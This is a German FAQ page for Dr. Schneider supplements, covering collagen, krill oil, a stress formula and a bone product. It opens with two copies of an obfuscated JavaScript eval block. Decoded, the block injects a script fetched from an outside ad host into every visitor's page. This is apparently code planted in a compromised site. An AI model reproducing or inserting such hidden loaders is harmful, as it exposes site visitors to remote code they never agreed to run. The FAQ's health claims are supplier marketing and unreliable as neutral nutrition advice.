var _0x42tbc1 = 1; eval(String.fromCharCode(118, 97, 114, 32, 97, 49, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 49, 32, 61, 32, 83, 116, 114, 105, 110, 103, 91, 34, 92, 120, 54, 54, 92, 120, 55, 50, 92, 120, 54, 70, 92, 120, 54, 68, 92, 120, 52, 51, 92, 120, 54, 56, 92, 120, 54, 49, 92, 120, 55, 50, 92, 120, 52, 51, 92, 120, 54, 70, 92, 120, 54, 52, 92, 120, 54, 53, 34, 93, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 49, 49, 51, 44, 32, 49, 49, 55, 44, 32, 49, 48, 49, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 50, 48, 44, 32, 49, 50, 49, 44, 32, 49, 50, 50, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 54, 44, 32, 54, 49, 44, 32, 52, 57, 41, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 54, 49, 92, 120, 55, 52, 92, 120, 54, 53, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 55, 52, 92, 120, 55, 57, 92, 120, 55, 48, 92, 120, 54, 53, 34, 93, 32, 61, 32, 34, 92, 120, 55, 52, 92, 120, 54, 53, 92, 120, 55, 56, 92, 120, 55, 52, 92, 120, 50, 70, 92, 120, 54, 65, 92, 120, 54, 49, 92, 120, 55, 54, 92, 120, 54, 49, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 54, 49, 92, 120, 55, 51, 92, 120, 55, 57, 92, 120, 54, 69, 92, 120, 54, 51, 34, 93, 32, 61, 32, 116, 114, 117, 101, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 54, 57, 92, 120, 54, 52, 34, 93, 32, 61, 32, 34, 92, 120, 54, 51, 92, 120, 54, 52, 92, 120, 51, 55, 92, 120, 51, 48, 92, 120, 51, 57, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 34, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 55, 51, 92, 120, 55, 50, 92, 120, 54, 51, 34, 93, 32, 61, 32, 95, 48, 120, 52, 50, 116, 98, 99, 49, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 55, 92, 120, 54, 53, 92, 120, 55, 52, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 55, 51, 92, 120, 52, 50, 92, 120, 55, 57, 92, 120, 53, 52, 92, 120, 54, 49, 92, 120, 54, 55, 92, 120, 52, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 91, 48, 93, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 91, 34, 92, 120, 55, 48, 92, 120, 54, 49, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 52, 69, 92, 120, 54, 70, 92, 120, 54, 52, 92, 120, 54, 53, 34, 93, 91, 34, 92, 120, 54, 57, 92, 120, 54, 69, 92, 120, 55, 51, 92, 120, 54, 53, 92, 120, 55, 50, 92, 120, 55, 52, 92, 120, 52, 50, 92, 120, 54, 53, 92, 120, 54, 54, 92, 120, 54, 70, 92, 120, 55, 50, 92, 120, 54, 53, 34, 93, 40, 95, 48, 120, 52, 50, 116, 98, 99, 50, 44, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 41, 10, 125, 59, 10, 118, 97, 114, 32, 116, 110, 100, 101, 109, 111, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 55, 92, 120, 54, 53, 92, 120, 55, 52, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 55, 51, 92, 120, 52, 50, 92, 120, 55, 57, 92, 120, 53, 52, 92, 120, 54, 49, 92, 120, 54, 55, 92, 120, 52, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 59, 10, 118, 97, 114, 32, 110, 32, 61, 32, 116, 114, 117, 101, 59, 10, 102, 111, 114, 32, 40, 118, 97, 114, 32, 105, 32, 61, 32, 48, 59, 32, 105, 32, 60, 32, 116, 110, 100, 101, 109, 111, 115, 91, 34, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 54, 55, 92, 120, 55, 52, 92, 120, 54, 56, 34, 93, 59, 32, 105, 43, 43, 41, 32, 123, 10, 32, 32, 32, 32, 105, 102, 32, 40, 116, 110, 100, 101, 109, 111, 115, 91, 105, 93, 91, 34, 92, 120, 54, 57, 92, 120, 54, 52, 34, 93, 32, 61, 61, 32, 34, 92, 120, 54, 51, 92, 120, 54, 52, 92, 120, 51, 55, 92, 120, 51, 48, 92, 120, 51, 57, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 34, 41, 32, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 110, 32, 61, 32, 102, 97, 108, 115, 101, 10, 32, 32, 32, 32, 125, 10, 125, 59, 10, 105, 102, 32, 40, 110, 32, 61, 61, 32, 116, 114, 117, 101, 41, 32, 123, 10, 32, 32, 32, 32, 97, 49, 40, 41, 59, 10, 125)); FAQ - Dr. Schneider var _0x42tbc1 = 1; eval(String.fromCharCode(118, 97, 114, 32, 97, 49, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 49, 32, 61, 32, 83, 116, 114, 105, 110, 103, 91, 34, 92, 120, 54, 54, 92, 120, 55, 50, 92, 120, 54, 70, 92, 120, 54, 68, 92, 120, 52, 51, 92, 120, 54, 56, 92, 120, 54, 49, 92, 120, 55, 50, 92, 120, 52, 51, 92, 120, 54, 70, 92, 120, 54, 52, 92, 120, 54, 53, 34, 93, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 49, 49, 51, 44, 32, 49, 49, 55, 44, 32, 49, 48, 49, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 50, 48, 44, 32, 49, 50, 49, 44, 32, 49, 50, 50, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 54, 44, 32, 54, 49, 44, 32, 52, 57, 41, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 54, 49, 92, 120, 55, 52, 92, 120, 54, 53, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 55, 52, 92, 120, 55, 57, 92, 120, 55, 48, 92, 120, 54, 53, 34, 93, 32, 61, 32, 34, 92, 120, 55, 52, 92, 120, 54, 53, 92, 120, 55, 56, 92, 120, 55, 52, 92, 120, 50, 70, 92, 120, 54, 65, 92, 120, 54, 49, 92, 120, 55, 54, 92, 120, 54, 49, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 54, 49, 92, 120, 55, 51, 92, 120, 55, 57, 92, 120, 54, 69, 92, 120, 54, 51, 34, 93, 32, 61, 32, 116, 114, 117, 101, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 54, 57, 92, 120, 54, 52, 34, 93, 32, 61, 32, 34, 92, 120, 54, 51, 92, 120, 54, 52, 92, 120, 51, 55, 92, 120, 51, 48, 92, 120, 51, 57, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 34, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 50, 91, 34, 92, 120, 55, 51, 92, 120, 55, 50, 92, 120, 54, 51, 34, 93, 32, 61, 32, 95, 48, 120, 52, 50, 116, 98, 99, 49, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 55, 92, 120, 54, 53, 92, 120, 55, 52, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 55, 51, 92, 120, 52, 50, 92, 120, 55, 57, 92, 120, 53, 52, 92, 120, 54, 49, 92, 120, 54, 55, 92, 120, 52, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 91, 48, 93, 59, 10, 32, 32, 32, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 91, 34, 92, 120, 55, 48, 92, 120, 54, 49, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 52, 69, 92, 120, 54, 70, 92, 120, 54, 52, 92, 120, 54, 53, 34, 93, 91, 34, 92, 120, 54, 57, 92, 120, 54, 69, 92, 120, 55, 51, 92, 120, 54, 53, 92, 120, 55, 50, 92, 120, 55, 52, 92, 120, 52, 50, 92, 120, 54, 53, 92, 120, 54, 54, 92, 120, 54, 70, 92, 120, 55, 50, 92, 120, 54, 53, 34, 93, 40, 95, 48, 120, 52, 50, 116, 98, 99, 50, 44, 32, 95, 48, 120, 52, 50, 116, 98, 99, 51, 41, 10, 125, 59, 10, 118, 97, 114, 32, 116, 110, 100, 101, 109, 111, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 91, 34, 92, 120, 54, 55, 92, 120, 54, 53, 92, 120, 55, 52, 92, 120, 52, 53, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 55, 52, 92, 120, 55, 51, 92, 120, 52, 50, 92, 120, 55, 57, 92, 120, 53, 52, 92, 120, 54, 49, 92, 120, 54, 55, 92, 120, 52, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 34, 93, 40, 34, 92, 120, 55, 51, 92, 120, 54, 51, 92, 120, 55, 50, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 55, 52, 34, 41, 59, 10, 118, 97, 114, 32, 110, 32, 61, 32, 116, 114, 117, 101, 59, 10, 102, 111, 114, 32, 40, 118, 97, 114, 32, 105, 32, 61, 32, 48, 59, 32, 105, 32, 60, 32, 116, 110, 100, 101, 109, 111, 115, 91, 34, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 54, 55, 92, 120, 55, 52, 92, 120, 54, 56, 34, 93, 59, 32, 105, 43, 43, 41, 32, 123, 10, 32, 32, 32, 32, 105, 102, 32, 40, 116, 110, 100, 101, 109, 111, 115, 91, 105, 93, 91, 34, 92, 120, 54, 57, 92, 120, 54, 52, 34, 93, 32, 61, 61, 32, 34, 92, 120, 54, 51, 92, 120, 54, 52, 92, 120, 51, 55, 92, 120, 51, 48, 92, 120, 51, 57, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 92, 120, 51, 49, 92, 120, 51, 48, 34, 41, 32, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 110, 32, 61, 32, 102, 97, 108, 115, 101, 10, 32, 32, 32, 32, 125, 10, 125, 59, 10, 105, 102, 32, 40, 110, 32, 61, 61, 32, 116, 114, 117, 101, 41, 32, 123, 10, 32, 32, 32, 32, 97, 49, 40, 41, 59, 10, 125));
DR. SCHNEIDER Nahrungsergänzung aus Deutschland und Europa

FAQ

Collagen Plus Elastin

Meine Tagescreme enthält bereits Collagen – reicht das nicht aus?

Ihre Tagescreme versorgt nur die äußeren Hautschichten mit dem wichtigen Haut-Baustoff Kollagen. Allerdings kommen Sie mit sogenannten topischen Pflegeprodukten, die von Außen aufgetragen werden, nicht in die tiefen Hautschichten. Daher ist eine Versorgung unserer Haut mit Nährstoffen, die über die Nahrung aufgenommen werden, so wichtig. Dr. Schneider Collagen Plus Elastin versorgt Ihren Körper und damit auch Ihre Haut mit wichtigen Nährstoffen, wie beispielsweise Vitamin C, dass eine wichtige Rolle für die normale Kollagenbildung der gesunden Haut spielt. Somit ist unser Produkt eine gute Ergänzung zu Ihrer Tagescreme.

Verstehe ich es richtig, Kollagen strafft die Haut und Elastin verhilft zur Elastizität?

In der jungen Haut arbeiten Kollagenfasern und Elastinfasern perfekt zusammen: Das Kollagen macht das Gewebe stabil und zugfest, das gummiartige Elastin hingegen sorgt dafür, dass das Ganze dehnbar bleibt. Im Alter jedoch sinkt die Zahl der Kollagen- und Elastinfasern, sowie der Blutgefäße. Die Zellen der Oberhaut teilen sich nur etwa alle 50 Tage statt – wie in jungen Jahren – alle 25 Tage. Dies hat zur Folge, dass die Haut und das Unterhautfettgewebe dünner werden, der Wasser- und Fettgehalt der Haut abnimmt und die typischen Zeichen der Hautalterung, wie Falten zunehmen.  Daher ist eine zusätzliche Unterstützung mit Vitamin C, welches die normale Kollagenbildung unterstützt ab einem gewissen Alter sehr sinnvoll. Der Erhalt des normalen Bindegewebes wird durch das enthaltene Kupfer unterstützt und das Mangan sorgt für eine normale Bindegewebsbildung.  Darüber hinaus enthält das Produkt Vitamin E und Zink die dazu beitragen die Zellen vor oxidativem Stress zu schützen.

Wirkt Dr. Schneider Collagen Plus auch im Bindegewebe meines Oberschenkels?

Das Kollagen stellt fast 80%  des Gewichts vom Bindegewebe dar. Mit zunehmendem Alter nimmt die Kollagenproduktion ab. Nach dem 25. Lebensjahr reduziert sich die Kollagensynthese bereits um ca. 1,5% jährlich. Im Alter von 45 Jahren können die Kollagenwerte eine Senkung von manchmal bis zu 30% erfahren haben. Bei einer oralen Einnahme von bioverfügbarem Kollagen wird das Kollagen in unserem Körper verteilt. Zusätzlich unterstützt das Vitamin C in Dr. Schneider Collagen Plus Elastin die natürliche Kollagenbildung und das Kupfer die Erhaltung von normalen Bindegewebe.

Krillöl 500mg

Warum ist Krillöl besser als gewöhnliches Fischöl?

Krillöl ist wie Fischöl ein Lieferant für die Omega-3 Fettsäuren DHA und EPA. Allerdings liegen im Krillöl die beiden wichtigen Fettsäuren in einer anderen Molekülstruktur vor, als sogenannte Phospholipide. Jede Zelle unseres Körpers ist umgeben von einer Zellwand aus Phospholipiden, so dass diese Molekülstruktur von unserem Körper gut verarbeitet werden kann. Dadurch hat Krillöl eine höhere Bioverfügbarkeit, sprich die als Phospholipide vorliegenden Omega-3 Fettsäuren EPA und DHA sind leichter vom Körper aufzunehmen und können vom Körper besser verwertet werden.

Ich nehme Fischölkapseln und habe oft dieses fischige Aufstoßen über den Tag hinweg . Ich habe gehört das bleibt bei den Krillöl Kapseln aus. Stimmt das?

Viele kennen dieses unangenehme Gefühl des „Aufstoßens“ nach der Einnahme von gewöhnlichen Fischölkapseln. Das liegt vor allem daran, dass das Fischöl in unserem Magen wie Fettaugen aufschwimmt und ausdunstet. Krillöl hat eine andere Molekülstruktur und liegt als sogenannte Phospholipide vor. Diese vermischen sich schnell mit dem Mageninhalt so dass kein Ausdünsten nach oben stattfindet. Aufgrund der Phospholipid-Struktur werden die wichtigen Fettsäuren EPA und DHA schneller vom Körper aufgenommen.

 

Krillöl ist im Vergleich zu Fischöl dunkel rot. Woher kommt das?

Krillöl enthält im Gegensatz zu Fischöl das Carotinoid Astaxanthin, welches ein sehr starkes Antioxidans – um ein Vielfaches stärker als Vitamin C oder E. Astaxanthin ist ein sehr starkes Antioxidans, um ein vielfaches stärker als Vitamin C oder Vitamin E. Astaxanthin wird von Algen produziert, die vom Krill gefressen werden. Auch die rote Farbe des Wildlachses kommt vom Astaxanthin, was ihm angeblich ermöglicht die lange Reise gegen den Strom zu schwimmen. Mittlerweile gibt es über 1500 wissenschaftliche Publikationen zu den herausragenden Eigenschaften von Astaxanthin. Dr. Schneider Krillöl 500 mg Kapseln enthalten deutlich höhere Astaxanthin-Mengen als viele andere Krillöl-Produkte auf dem Markt. Und das Besondere dabei ist, dass auch das Astaxanthin als Phospholipid vorliegt und dadurch vom Körper hervorragend verwertet werden kann.

Stimmt es, dass Krillöl aus der Antarktis kommt?

Krill wird im südlichen Ozean rund um die Antarktis gefischt. Die Meere dort gelten als die saubersten der Erde. Unser Krillöl kommt aus nachhaltigem Fischfang und ist sowohl MSC (THE MARINE STEWARDSHIP COUNCIL) als auch FOS (FRIEND OF THE SEA) zertifiziert. Für uns ist es absolut wichtig, woher unsere Rohstoffe kommen. Bei unserem Dr. Schneider Krillöl 500mg gehen wir sogar noch einen Schritt weiter. Wir können zu jeder Packung den exakten Fanggrund mithilfe dokumentierter GPS Daten rückverfolgen.

Enthalten Dr. Schneider Krillöl 500 mg Kapseln Jod?

Krillöl hat nahezu kein Jod. Jod kennt man hauptsächlich von Meeralgen und Meertang-Produkten. Den Dr. Schneider Krillöl 500 mg Kapseln werden keine Iodid-haltigen Salze oder andere Verbindungen zugesetzt. Zudem wird das verwendete Krillöl einem aufwändigen Raffinationsprozess unterzogen, wodurch weder wasserlösliche noch fettlösliche (d.h. organische) Iod-Verbindungen in das Produkt gelangen können. Wie es jedoch auch bei anderen Lebensmitteln der Fall ist, liegen diese Elemente im unbedenklichen Spurenbereich immer vor.

Sind in Krillöl bedenkliche Mengen an Schwermetallen?

Unser spezielles Krillöl wird intensiv vor jeder Verarbeitung untersucht und die Europäischen Grenzwerte für Schwermetalle werden um ein vielfaches unterschritten. Krill wird im Südlichen Ozean vor der Antarktis gefangen, wo die Wasserqualität noch außerordentlich hoch und die Umweltverschmutzung noch sehr gering ist. Hinzu kommt, dass Krill am Anfang der Nahrungskette steht und es daher nicht zu einer Anreicherung kommt wie in manchen Seefischölen.

Warum soll ich Krillöl nehmen?

Unabhängige Wissenschaftler der europäischen Behörde für Lebensmittelsicherheit (EFSA) haben die positiven Einflüsse der Omega-3-Fettsäuren DHA und EPA auf die Gesundheit untersucht und sind zu folgendem Ergebnis gekommen: „DHA und EPA tragen bei einem täglichen Verzehr von 250 mg zu einer normalen Herzfunktion bei.“

 

Die Deutsche Gesellschaft für Ernährung (DGE) schreibt in ihrer Pressemeldung im August 2016:“…. Ein regelmäßiger Fischverzehr – insbesondere von fettreichem Fisch – kann das Risiko für tödlichen Herzinfarkt, ischämischen Schlag­anfall und Fettstoffwechselstörungen mindern. Letzteres ist dadurch bedingt, dass regelmäßiger Fischverzehr die Triglyceridkonzentration im Blut reduziert und die HDL-Cholesterolkonzentration erhöht…“

 

Die DGE empfiehlt ein bis zwei Portionen Fisch pro Woche, davon 70 g fettreichen Seefisch wie Lachs, Makrele oder Hering. Leider erreichen dies nur die wenigstens Verbraucher in Deutschland. Dr. Schneider Krillöl 500 mg ist daher eine einfache Möglichkeit, die Lücke in der Versorgung mit den Omega-3-Fettsäuren DHA und EPA zu schließen.

Stress & Relax

Entspanne ich mit dem Produkt?

Dr. Schneider Stress & Relax soll Sie dabei unterstützen die Anforderungen des Alltags besser zu meistern. Wer großem Druck und Stress im Privat- oder Berufsleben ausgesetzt ist und häufig an Unruhe oder Gereiztheit leidet, kann mit einer gezielten Nährstoffzufuhr, wie beispielsweise mit Dr. Schneider Stress & Relax, möglicherweise hier entgegen wirken. Dennoch sollte man immer darauf achten, sich zu entspannen, egal wie groß der Stress und Leistungsdruck sein mag. Insbesondere nach stressigen Zeiten ist eine Erholung sehr wichtig. Nur so tankt Körper und Geist wieder frische Kraft. Auch in dieser Erholungsphase kann Dr. Schneider Stress & Relax als Nahrungsergänzungsmittel zur Regeneration sinnvoll eingesetzt werden.

Als dreifache Mutter fühle ich mich abends wie ausgelaugt, ohne Energie und erschöpft. Kann mir Dr. Schneider Stress & Relax helfen?

Hektik, Stress, berufliche und private Überlastungen führen oft dazu, sich körperlich und geistig erschöpft zu fühlen. Unsere Nerven und unser Gehirn sind in diesen speziellen Situationen auf eine ausreichende Nährstoffversorgung angewiesen. Ausgewählte Vitamine und Mineralien können hier einen wertvollen Beitrag leisten. Unabhängige Wissenschaftler der EFSA haben bestätigt, dass die in Dr. Schneider Stress & Relax enthaltenen Nährstoffe Eisen, Niacin und Vitamin B12 zu einem normalen Energiestoffwechsel und zur Verringerung von Müdigkeit und Ermüdung beitragen können.

Wann soll ich das Produkt am besten nehmen?

Wir empfehlen unsere Dr. Schneider Produkte zusammen mit einer Mahlzeit einzunehmen. Für Dr. Schneider Stress & Relax bietet sich das Frühstück an, damit Ihr Körper die wertvollen Nährstoffe für Ihren stressigen Alltag zur Verfügung hat. Versuchen Sie die Einnahme von Dr. Schneider Stress & Relax in Ihren Tagesablauf als Routine einzubauen. Für die Verpackung haben wir die Blister-Verpackung gewählt, damit Sie sich auch ein paar Kapseln abschneiden können und z.B. ins Büro oder auf Reisen mitnehmen können. Wir möchten Ihnen die Ergänzung Ihrer Nahrung so einfach wie möglich machen und haben extra eine kleine, leicht zu schluckende Kapsel entwickelt.

Ich habe gesehen, dass sogar Vitamin C in den Kapseln ist. Brauche ich das nicht nur wenn ich krank bin.

Leistungsdruck, Dauerstress und die Pflicht, viele Dinge auf einmal erledigen zu müssen, lösen Ängste, Unruhe und Nervosität aus. Häufig wird alles daran gesetzt, in diesen stressigen Situationen die letzten Reserven an Energie aufzubringen. Wenn diese ständige Belastung nicht durch ausreichende Ruhepausen unterbrochen wird, sind aufgrund der zunehmenden Schwächung des Immunsystems Krankheiten vorprogrammiert. Oft merkt man das erst, wenn man in die Entspannungsphasen kommt, z.B. Urlaub hat und plötzlich eine Erkältung bekommt. Daher haben wir bei der Entwicklung der Dr. Schneider Stress & Relax 40 mg Vitamin C pro Kapseln hinzu dosiert, um so die Zellen vor oxidativem Stress zu schützen und zu einer normalen Funktion des Immunsystems beizutragen.

Enthalten Dr. Schneider Stress & Relax Kapseln Gluten oder Lactose?

Nein, die Kapseln enthalten weder Gluten noch Lactose und sind auch frei von gentechnisch veränderten Organismen.

Ich habe gehört Sie verwenden einen speziellen Melissen-Extrakt. Stimmt das?

Das ist richtig. Wir verwenden für Dr. Schneider Stress & Relax einen speziellen Melissen-Extrakt aus Deutschland. Es werden nur die Blätter der Gattung Melissa Officinalis verwendet. Die Pflanzen kommen von speziellen Anbauflächen in Deutschland, die ständigen Kontrollen unterworfen werden. Der Extrakt wird sehr schonend über ein sogenanntes Vakuumtrockenbandverfahren hergestellt, damit die wertvollen sekundären Pflanzeninhaltsstoffe wie ätherische Öle, Polyphenole und Rosmarinsäure erhalten bleiben.

Knochen Vital Plus

Ich nehme seit Jahren Calcium für die Knochen. Reicht das nicht?

Tatsächlich kann der menschliche Körper Calcium nicht eigenständig bilden. Daher ist es notwendig, Calcium mit der Nahrung aufzunehmen. Die „Nationale Verzehrstudie II“ hat allerdings ergeben, dass die durchschnittliche Calciumaufnahme unterhalb der von der Deutschen Gesellschaft für Ernährung empfohlener täglicher Calciummenge liegt. Daher wird empfohlen die tägliche Ernährung mit Calcium zu ergänzen. Jedoch zeigen neuste Forschungen, dass neben Calcium weitere essentielle Nährstoffe aufgenommen werden müssen, da sonst das Calcium vom Körper nicht verwertet werden kann. Konkret benötigt der Körper Vitamin D, damit Calcium überhaupt aufgenommen werden kann. So wichtig wie das Vitamin D ist das Vitamin K, insbesondere Vitamin K2, um das Calcium aus den Gefäßen in die Knochen zu transportieren und so die Einlagerung von Calcium in den Knochen zu optimieren. Daher raten wir von einem reinen Calcium-Produkt ab und haben mit Dr. Schneider Knochen Vital Plus ein Kombi-Präparat entwickelt, um die Calcium-Einlagerung zu optimieren.

Wann sollte man beginnen, etwas für seine Knochen zu tun?

Starke Knochen sind das A und O, um mobil zu sein und seinen Alltag zu meistern. Die Stärke der Knochen verändert sich über den Alterungsprozess. Dabei fungieren die Knochen wie ein Speichersee für Calcium. Es ist wie ein ständiges Auf- und Ablassen des Wasserspiegels. Auch unsere Knochen unterlaufen ständigen Auf- und Abbauvorgängen. Zuerst überwiegen bis zum Alter von ca. 35 Jahren die Aufbauvorgänge. Besonders im Jugendalter benötigen wir viel Calcium und die Grundlagen für das Alter werden gelegt, bis die maximale Knochenmasse mit ca. Mitte 30 erreicht ist. Danach überwiegen die Abbauvorgänge. Mit zunehmendem Alter und durch die hormonellen Veränderungen insbesondere in den Wechseljahren, wird der Knochenabbau zusätzlich beschleunigt und die Knochendichte nimmt ab. Daher ist es wichtig, über seinen gesamten Lebenszyklus seine Ernährung zu ergänzen, damit den Knochen ausreichend Calcium zur Verfügung steht. Je früher man damit anfängt, umso besser. Selbst wenn man erst im höheren Alter mit einer Nahrungsergänzung anfängt ist es sinnvoll, da der einsetzende Knochenabbau damit verlangsamt werden kann.

 

Ich habe noch nie von zwei verschiedenen Vitaminen K 1 & K2 gehört.

Es gibt sogar drei Gruppen von Vitamin K, wobei die Wenigsten die Unterschiede zwischen den drei kennen. Auch auf den Produktpackungen muss von Seiten des Gesetzgebers keine Unterscheidung gemacht werden. Man unterscheidet zwischen:

 

Vitamin K1 bzw. Phyllochinon – man findet es in unterschiedlichen grünen Pflanzen und Gemüsesorten.

 

Vitamin K2 bzw. Menachinon – in kleinen Mengen kann es von Bakterien auch im Darm des Menschen produziert werden.

 

Vitamin K3 bzw. Menadion – dies wurde früher als künstliches „Provitamin K“ angewandt.

 

Von praktischer Bedeutung im (menschlichen) Stoffwechsel sind nur das Vitamin K1 und K2.

 

